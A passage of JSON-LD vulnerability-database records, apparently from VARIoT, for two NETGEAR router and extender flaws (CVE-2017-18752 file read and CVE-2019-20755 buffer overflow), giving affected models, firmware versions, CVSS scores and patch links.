"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1356",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.94"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.24"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7300dst",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "r7900",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.12"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:ex3700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex3800_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6120_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:ex6130_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6700_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7300dst_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r7900_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
}
]
},
"cve": "CVE-2017-18752",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2017-18752",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-014941",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2021-52948",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18752",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-18752",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-014941",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-18752",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2017-18752",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2017-014941",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2021-52948",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1926",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1926"
},
{
"db": "NVD",
"id": "CVE-2017-18752"
},
{
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by an attacker\u0027s ability to read arbitrary files. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.94. plural NETGEAR The device contains a vulnerability related to information leakage.Information may be obtained. NETGEAR R8500, etc. are all products of NETGEAR. NETGEAR R8500 is a wireless router. NETGEAR R6300 is a wireless router. NETGEAR EX3700 is a wireless WiFi signal range extender. \n\r\n\r\nThere are security vulnerabilities in many NETGEAR products",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-18752"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "CNVD",
"id": "CNVD-2021-52948"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-18752",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-52948",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1926",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1926"
},
{
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"id": "VAR-202004-1356",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
}
],
"trust": 1.0382638566666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
}
]
},
"last_update_date": "2024-11-23T21:51:30.951000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Arbitrary File Read on Some Routers and Extenders, PSV-2017-0319",
"trust": 0.8,
"url": "https://kb.netgear.com/000051502/Security-Advisory-for-Arbitrary-File-Read-on-Some-Routers-and-Extenders-PSV-2017-0319"
},
{
"title": "Patch for Information Disclosure Vulnerabilities in Multiple NETGEAR Products (CNVD-2021-52948)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/280021"
},
{
"title": "Multiple NETGEAR Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=116697"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1926"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18752"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051502/security-advisory-for-arbitrary-file-read-on-some-routers-and-extenders-psv-2017-0319"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18752"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1926"
},
{
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1926"
},
{
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1926"
},
{
"date": "2020-04-22T17:15:11.510000",
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-52948"
},
{
"date": "2020-05-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014941"
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1926"
},
{
"date": "2024-11-21T03:20:50.170000",
"db": "NVD",
"id": "CVE-2017-18752"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1926"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Information leakage vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014941"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1926"
}
],
"trust": 0.6
}
}
var-202004-0735
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6220 before 1.0.0.46, D6400 before 1.0.0.80, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v1 before 1.0.0.58, DGN2200B before 1.0.0.58, JNDR3000 before 1.0.0.24, RBW30 before 2.1.4.16, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.42, R6400v2 before 1.0.2.56, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.32, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7000P before 1.3.1.44, R7900 before 1.0.2.16, R8000P before 1.4.0.10, R7900P before 1.4.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R8000 before 1.0.4.18, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, WNR3500Lv2 before 1.2.0.54, WN3100RP before 1.0.0.20, and WN2500RPv2 before 1.0.1.54. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250, etc. are all wireless routers from NETGEAR. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. Attackers can use this vulnerability to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0735",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.16"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "jndr3000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "rbw30",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "2.1.4.16"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.32"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.0.10"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.56"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "wn3100rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.20"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "dgn2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "jndr3000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "rbw30",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "2.1.4.16"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.51"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.54"
},
{
"model": "dgn2200v1",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.56"
},
{
"model": "wndr4500v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "wn3100rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.20"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-61061"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
},
{
"db": "NVD",
"id": "CVE-2019-20755"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:jndr3000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:rbw30_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015460"
}
]
},
"cve": "CVE-2019-20755",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CVE-2019-20755",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.2,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015460",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CNVD-2021-61061",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
